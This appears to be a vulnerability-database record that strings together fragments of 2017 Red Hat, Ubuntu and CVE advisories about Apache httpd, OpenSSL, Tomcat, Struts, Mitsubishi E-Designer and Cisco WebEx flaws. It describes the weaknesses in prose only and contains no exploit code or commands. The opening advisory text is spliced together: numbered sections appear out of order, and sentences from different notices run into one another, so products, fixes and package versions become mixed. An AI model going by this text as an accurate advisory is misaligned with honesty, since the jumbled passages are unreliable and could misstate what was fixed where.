https://access.redhat.com/security/cve/CVE-2017-7659
https://access.redhat.com/security/cve/CVE-2017-7668
https://access.redhat.com/security/cve/CVE-2017-7679
https://access.redhat.com/security/cve/CVE-2017-9788
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.
This release provides an update to httpd and OpenSSL. The updates are
documented in the Release Notes document linked to in the References.
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and
Transport Layer Security (TLS) protocols, as well as a full-strength
general-purpose cryptography library.
This release of JBoss Enterprise Application Platform 6.4.18 Natives serves
as a replacement of the JBoss Enterprise Application Platform 6.4.16
Natives and includes bug fixes which are documented in the Release Notes
document linked to in the References.
(CVE-2017-9788)
* A flaw was found in the way the DES/3DES cipher was used as part of the
TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to
recover some plaintext data by capturing large amounts of encrypted traffic
between TLS/SSL server and client if the communication used a DES/3DES
based ciphersuite. Upstream acknowledges Karthikeyan
Bhargavan (Inria) and Gaëtan Leurent (Inria) as the original reporters of
CVE-2016-2183.
Bug Fix(es):
* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1508880)
* mod_cluster segfaults in process_info() due to wrongly generated
assembler instruction movslq (BZ#1508884)
* Corruption in nodestatsmem in multiple core dumps but in different
functions of each core dump. (BZ#1508885)
4. For the update to take effect, all services linked to the
OpenSSL library must be restarted, or the system rebooted. The JBoss server
process must be restarted for the update to take effect.
===========================================================================
Ubuntu Security Notice USN-3370-2
August 01, 2017
apache2 vulnerability
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
Apache HTTP Server could be made to crash or leak sensitive information
if it received specially crafted network traffic.
Original advisory details:
Robert Swiecki discovered that the Apache HTTP Server mod_auth_digest
module incorrectly cleared values when processing certain requests.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 ESM:
apache2.2-bin 2.2.22-1ubuntu1.13
In general, a standard system update will make all the necessary
changes. This software, such as Apache HTTP Server, is
common to multiple JBoss middleware products, and is packaged under Red Hat
JBoss Core Services to allow for faster distribution of updates, and for a
more consistent update experience. An httpd module using
this API function could consequently allow access that should have been
denied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-329 - Unable to load large CRL openssl problem
JBCS-337 - Errata for httpd 2.4.23 SP2 RHEL 6
7. 7.3) - ppc64, ppc64le, s390x, x86_64
3. (CVE-2017-7679)
* A use-after-free flaw was found in the way httpd handled invalid and
previously unregistered HTTP methods specified in the Limit directive used
in an .htaccess file. (CVE-2017-9798)
Red Hat would like to thank Hanno Böck for reporting CVE-2017-9798.
Apache Tomcat is a servlet container for the Java Servlet and JavaServer
Pages (JSP) technologies.
(CVE-2017-9788)
* A vulnerability was discovered in Tomcat where if a servlet context was
configured with readonly=false and HTTP PUT requests were allowed, an
attacker could upload a JSP file to that context and achieve code
execution. (CVE-2017-12615)
The References section of this erratum contains a download link (you must
log in to download the update)
| VAR-201709-1229 | CVE-2017-9805 | Apache Struts 2 framework REST plugin insecurely deserializes untrusted XML data |
CVSS V2: 6.8 CVSS V3: 8.1 Severity: HIGH |
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. Apache Struts 2 framework, versions 2.5 to 2.5.12, with REST plugin insecurely deserializes untrusted XML data. A remote, unauthenticated attacker can leverage this vulnerability to execute arbitrary code in the context of the Struts application. Apache Struts 2 contains a vulnerability that allows arbitrary code execution (S2-052).
An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts will likely result in denial-of-service conditions.
Apache Struts 2.1.2 through 2.3.33 and 2.5 through 2.5.12 are vulnerable
| VAR-201804-0784 | CVE-2017-9638 | Mitsubishi Electric Europe B.V. E-Designer Buffer Overflow Vulnerability |
CVSS V2: 9.3 CVSS V3: 9.8 Severity: HIGH |
Mitsubishi E-Designer, Version 7.52 Build 344 contains six code sections which may be exploited to overwrite the stack. This can result in arbitrary code execution, compromised data integrity, denial of service, and system crash. Mitsubishi E-Designer contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mitsubishi Electric E-Designer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of SetupAlarm sections of an mpa (project specification) file. When parsing the Font property, the process fails to properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the Administrator. E-Designer is E-series programming software from Mitsubishi Electric Europe B.V. Mitsubishi E-Designer is prone to the following vulnerabilities:
1. Multiple stack-based overflow vulnerabilities.
2. Multiple heap-based overflow vulnerabilities.
3. Multiple denial-of-service overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions.
| VAR-201706-0585 | CVE-2017-6669 | Cisco WebEx Network Recording Player ARF File Memory Corruption Remote Code Execution Vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: MEDIUM |
Multiple buffer overflow vulnerabilities exist in the Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) files. An attacker could exploit these vulnerabilities by providing a user with a malicious ARF file via email or URL and convincing the user to launch the file. Exploitation of these vulnerabilities could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. The Cisco WebEx Network Recording Player is an application that is used to play back WebEx meeting recordings that have been recorded on the computer of an online meeting attendee. The player can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The following client builds are affected by this vulnerability: Cisco WebEx Business Suite (WBS29) client builds prior to T29.13.130, Cisco WebEx Business Suite (WBS30) client builds prior to T30.17, Cisco WebEx Business Suite (WBS31) client builds prior to T31.10. Cisco Bug IDs: CSCvc47758 CSCvc51227 CSCvc51242. The vendor has confirmed this vulnerability and released it under Bug IDs CSCvc47758, CSCvc51227, and CSCvc51242. Information may be obtained or altered, and service operation may be disrupted (DoS). The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. A buffer overflow vulnerability exists in the Cisco WebEx Network Recording Player. This vulnerability stems from incorrect verification of data boundaries when the product performs operations on memory, resulting in incorrect reads and writes to other associated memory locations. Versions prior to 10
| VAR-201804-0783 | CVE-2017-9636 | Mitsubishi E-Designer Buffer error vulnerability |
CVSS V2: 9.3 CVSS V3: 9.8 Severity: HIGH |
Mitsubishi E-Designer, Version 7.52 Build 344 contains five code sections which may be exploited to overwrite the heap. This can result in arbitrary code execution, compromised data integrity, denial of service, and system crash. Mitsubishi E-Designer contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mitsubishi Electric E-Designer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of a driver configuration file when initializing the BEMicroLogix component. When parsing the TCP_IP_Address property, the process fails to properly validate the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the Administrator. E-Designer is E-series programming software from Mitsubishi Electric Europe B.V. Mitsubishi Electric Europe B.V. Mitsubishi E-Designer is prone to the following vulnerabilities:
1. Multiple stack-based overflow vulnerabilities.
2. Multiple heap-based overflow vulnerabilities.
3. Multiple denial-of-service overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions.
| VAR-201804-0782 | CVE-2017-9634 | Mitsubishi E-Designer Vulnerable to out-of-bounds writing |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: HIGH |
Mitsubishi E-Designer, Version 7.52 Build 344 contains two code sections which may be exploited to allow an attacker to overwrite arbitrary memory locations. This can result in arbitrary code execution, compromised data integrity, denial of service, and system crash. Mitsubishi E-Designer contains an out-of-bounds write vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of TxStaticString sections of an mpa (project specification) file. An out-of-bounds value for the column specification will cause a user-supplied string to be written to an arbitrary memory address. An attacker can leverage this vulnerability to execute arbitrary code in the context of the Administrator. E-Designer is E-series programming software from Mitsubishi Electric Europe B.V. Mitsubishi Electric Europe B.V. Mitsubishi E-Designer is prone to the following vulnerabilities:
1. Multiple stack-based overflow vulnerabilities.
2. Multiple heap-based overflow vulnerabilities.
3. Multiple denial-of-service overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions.
Mitsubishi E-Designer version 7.52 Build 344 is vulnerable; other versions may also be affected